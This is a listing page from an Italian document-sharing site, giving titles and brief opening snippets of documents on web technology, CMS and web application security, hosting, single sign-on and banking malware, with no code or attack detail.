WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved WEB TECHNOLOGY Il web connette LE persone Indice «Il Web non si limita a collegare macchine, ma connette delle persone» Il Www, Client e Web Server pagina 3-4 - 5 CMS e template pagina 6-7-8 Tim Berners-Lee

Dettagli

Tutti i CMS sono vulnerabili

Tutti i CMS sono vulnerabili Ogni sito realizzato con i CMS open-source più diffusi (WordPress, Joomla!, Drupal, etc.) se non correttamente gestito, può presentare innumerevoli problemi di sicurezza. 23/01/13-1/45 I progetti open

Dettagli

AREA SERVIZI ICT. Servizi di hosting offerti dall'area Servizi ICT. Contestualizzazione tecnologica. hosting.polimi.it

AREA SERVIZI ICT. Servizi di hosting offerti dall'area Servizi ICT. Contestualizzazione tecnologica. hosting.polimi.it AREA SERVIZI ICT Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica hosting.polimi.it Indice 1. Contestualizzazione... 4 1.1. Content Management System... 4 1.1.1. Componente

Dettagli

Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica. Area Servizi ICT

Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica. Area Servizi ICT Area Servizi ICT Servizi hosting di Ateneo Contestualizzazione tecnologica Versione 1.1 http://hosting.polimi.it Servizi di hosting offerti dall'area Servizi ICT Contestualizzazione tecnologica Politecnico

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

ATM. Compatibile con diversi Canali di Comunicazione. Call Center / Interactive Voice Response

ATM. Compatibile con diversi Canali di Comunicazione. Call Center / Interactive Voice Response Compatibile con diversi Canali di Comunicazione Call Center / Interactive Voice Response ATM PLUS + Certificato digitale Dispositivi Portatili Mutua Autenticazione per E-mail/documenti 46 ,classico richiamo

Dettagli

Attacchi - panoramica

Attacchi - panoramica Attacchi - panoramica Metodi e strumenti per la Sicurezza informatica Claudio Telmon claudio@telmon.org Tecniche di attacco Più passaggi prima del destinatario (stepstones) Accesso da sistemi poco controllati

Dettagli

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director Banking Cybercrime: Attacchi e scenari di banking malware in Italia Giorgio Fedon Owasp Italy Technical Director IEEE-DEST 2012 giorgio.fedon@owasp.org Copyright The OWASP Foundation Permission is granted

Dettagli

Sicurezza e virtualizzazione per il cloud

Sicurezza e virtualizzazione per il cloud Sicurezza e virtualizzazione per il cloud Con il cloud gli utenti arrivano ovunque, ma la protezione dei dati no. GARL sviluppa prodotti di sicurezza informatica e servizi di virtualizzazione focalizzati

Dettagli

18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET

18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET 18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso ai database

Dettagli

Identity Access Management nel web 2.0

Identity Access Management nel web 2.0 Identity Access Management nel web 2.0 Single Sign On in applicazioni eterogenee Carlo Bonamico, NIS s.r.l. carlo.bonamico@nispro.it 1 Sommario Problematiche di autenticazione in infrastrutture IT complesse

Dettagli

Aspetti applicativi e tecnologia

Aspetti applicativi e tecnologia Aspetti applicativi e tecnologia Premessa Architetture usate per i database Le prime applicazioni erano definite monolitiche, cioè un unico computer (mainframe) gestiva sia le applicazioni che i dati,

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

POR Calabria FSE 2007/2013 Asse II Occupabilità Obiettivo operativo D1

POR Calabria FSE 2007/2013 Asse II Occupabilità Obiettivo operativo D1 Allegato n. 2 al Capitolato speciale d appalto. ENTE PUBBLICO ECONOMICO STRUMENTALE DELLA REGIONE CALABRIA POR Calabria FSE 2007/2013 Asse II Occupabilità Obiettivo operativo D1 Procedura aperta sotto

Dettagli

Architettura Connettore Alfresco Share

Architettura Connettore Alfresco Share Direzione Sistemi Informativi Portale e Orientamento Allegato n. 2 al Capitolato Tecnico Indice Architettura Connettore Alfresco Share 1. Architettura del Connettore... 3 1.1 Componente ESB... 4 1.2 COMPONENTE

Dettagli

Lezione di Basi di Dati 1 18/11/2008 - TECNOLOGIE PER IL WEB: CGI - AJAX SERVLETS & JSP

Lezione di Basi di Dati 1 18/11/2008 - TECNOLOGIE PER IL WEB: CGI - AJAX SERVLETS & JSP EVOLUZIONE DEL WEB: PAGINE STATICHE vs PAGINE DINAMICHE Il Web è nato a supporto dei fisici, perché potessero scambiare tra loro le informazioni inerenti le loro sperimentazioni. L HTTP è nato inizialmente

Dettagli

Tecnologie di Sviluppo per il Web

Tecnologie di Sviluppo per il Web Tecnologie di Sviluppo per il Web Programmazione Web: Architetture versione 2.2 Questo lavoro è concesso in uso secondo i termini di una licenza Creative Commons (vedi ultima pagina) G. Mecca mecca@unibas.it

Dettagli

A2A technical presentation

A2A technical presentation A2A technical presentation Milano, 24 Sept 2012 Enrico Papalini IT Development Manager Attuale modalità di connessione LU6.2 LU6.2 response IAG HTTP client Mainframe or Customer Server HTTP service Https

Dettagli

EyesDGTV. Your digital terrestrial television. Soluzioni Informatiche

EyesDGTV. Your digital terrestrial television. Soluzioni Informatiche EyesDGTV Your digital terrestrial television Soluzioni Informatiche Cos è EyesDGTV è la soluzione che Betacom propone per la televisione digitale terrestre. Basata su tecnologie consolidate, quali J2EE

Dettagli

Accesso alle applicazioni protetto. Ovunque.

Accesso alle applicazioni protetto. Ovunque. Scheda tecnica Accesso alle applicazioni protetto. Ovunque. Utenti mobili protetti Nelle organizzazioni odierne, ai responsabili IT viene spesso richiesto di fornire a diversi tipi di utente l'accesso

Dettagli

Banking Malware evolution in Italy: defense approach

Banking Malware evolution in Italy: defense approach Banking Malware evolution in Italy: defense approach (Giorgio Fedon OWASP-Italy Minded Security ) 17 Aprile 2012 Pag. 1 Presentazione Ricerca OWASP Italy Board Member OWASP Antimalware project leader Testing

Dettagli

Indice. Prefazione. Presentazione XIII. Autori

Indice. Prefazione. Presentazione XIII. Autori INDICE V Indice Prefazione Presentazione Autori XI XIII XV Capitolo 1 Introduzione alla sicurezza delle informazioni 1 1.1 Concetti base 2 1.2 Gestione del rischio 3 1.2.1 Classificazione di beni, minacce,

Dettagli

Web Programming Specifiche dei progetti

Web Programming Specifiche dei progetti Web Programming Specifiche dei progetti Paolo Milazzo Anno Accademico 2010/2011 Argomenti trattati nel corso Nel corso di Web Programming sono state descritti i seguenti linguaggi (e tecnologie): HTML

Dettagli

CMS (Content Management System) della categoria Open Source

CMS (Content Management System) della categoria Open Source Una panoramica sui CMS (Content Management System) CMS (Content Management System) della categoria Open Source Per la piattaforma PHP/MYSQL e considerata l esigenza sempre più ricorrente di realizzare

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit.

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit. Security by design Come la gestione di un progetto può minimizzare i rischi per il business Alessio L.R. Pennasilico - apennasilico@clusit.it 22 Febbraio 2013 - Milano Alessio L.R. Pennasilico Security

Dettagli

ALLEGATO C STANDARD TECNICI DELLA BORSA CONTINUA NAZIONALE DEL LAVORO

ALLEGATO C STANDARD TECNICI DELLA BORSA CONTINUA NAZIONALE DEL LAVORO ALLEGATO C STANDARD TECNICI DELLA BORSA CONTINUA NAZIONALE DEL LAVORO Standard tecnici Gli standard tecnici di riferimento adottati sono conformi alle specifiche e alle raccomandazioni emanate dai principali

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

Implicazioni sociali dell informatica

Implicazioni sociali dell informatica Fluency Implicazioni sociali dell informatica Capitolo 10 Privacy I nostri corpi I nostri luoghi Le informazioni Le comunicazioni personali La privacy Con i moderni dispositivi è possibile violare la privacy

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Single Sign On sul web

Single Sign On sul web Single Sign On sul web Abstract Un Sigle Sign On (SSO) è un sistema di autenticazione centralizzata che consente a un utente di fornire le proprie credenziali una sola volta e di accedere a molteplici

Dettagli